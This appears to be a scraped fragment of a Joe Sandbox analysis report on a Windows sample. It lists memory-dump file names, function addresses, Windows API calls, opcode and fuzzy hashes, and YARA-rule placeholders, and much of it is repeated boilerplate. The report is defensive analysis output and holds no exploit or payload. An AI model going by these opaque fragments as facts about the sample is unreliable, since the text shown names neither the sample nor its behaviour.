Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: d73e3d02eaa1993a9099124991b007923585922c4d44823be4745660459d9d38
Instruction ID: 5b3e0e57113457ffee3531bf2e471c29076735fd04a01847bfef0dc0edcb14e6
Opcode Fuzzy Hash: d73e3d02eaa1993a9099124991b007923585922c4d44823be4745660459d9d38
Instruction Fuzzy Hash: 362179322852009BFB08DFA8DC8576DF766DBD1314F24861AF4149B3D0C776AAA08753

Function 009D7D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009D7ED3

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 3ff79a21e5718585590e146ff6127b90f748040af72573fc81ad1370ec011a3f
Instruction ID: 29bc1b0faeffc13dedc5801acb423be46167cc1f961dbff1f0f743752db2964c
Opcode Fuzzy Hash: 3ff79a21e5718585590e146ff6127b90f748040af72573fc81ad1370ec011a3f
Instruction Fuzzy Hash: 3BE11B71E40244ABDF15FB68DC0779EB762AB81710F94869DE419A73C2DB354F818BC2

Function 00A0D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A0A813,00000001,00000364,00000006,000000FF,?,00A0EE3F,?,00000004,00000000,?,?), ref: 00A0D870

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2af484f140fd4ab52e18418d4f948f138ad374782765376678e421f6648af19f
Instruction ID: 12a46d72e7c7e2301666d5c69ecdf2f46e7d4eab71ba053797ed32c16cec9847
Opcode Fuzzy Hash: 2af484f140fd4ab52e18418d4f948f138ad374782765376678e421f6648af19f
Instruction Fuzzy Hash: 9CF0A733A4512D66EB216BF6BD01A6B3B99DF817B0F29C121FC04A71D1DA30EC1886E0

Function 009D87B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,009DDA1D,?,?,?,?), ref: 009D87B9

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 943e966c578d8eab55b13ce287a5dd924de91de734b02792e4d73877b6323f10
Instruction ID: fa832006df011766595562b4e4679d79166b37a96ca33f8bb02d29022250ba38
Opcode Fuzzy Hash: 943e966c578d8eab55b13ce287a5dd924de91de734b02792e4d73877b6323f10
Instruction Fuzzy Hash: 39C08C280A260005FD1C0B3800888AA330D4A477A83F46B85E0704F3E3CA3578679650

Function 009D87B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,009DDA1D,?,?,?,?), ref: 009D87B9

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 83998b77d314774676e24f2c40784e6d44f0b8fd6222013dd89a6576798366f3
Instruction ID: c76de841557a914b4de77adfe6791592a5cca9f99824d8966e9b74e25fa97625
Opcode Fuzzy Hash: 83998b77d314774676e24f2c40784e6d44f0b8fd6222013dd89a6576798366f3
Instruction Fuzzy Hash: ECC08C380A220046FA1C4B38408886A321D9A037283F05B89E0314F3E3CB32E463CAA0

Function 009DB1A0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009DB3C8

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
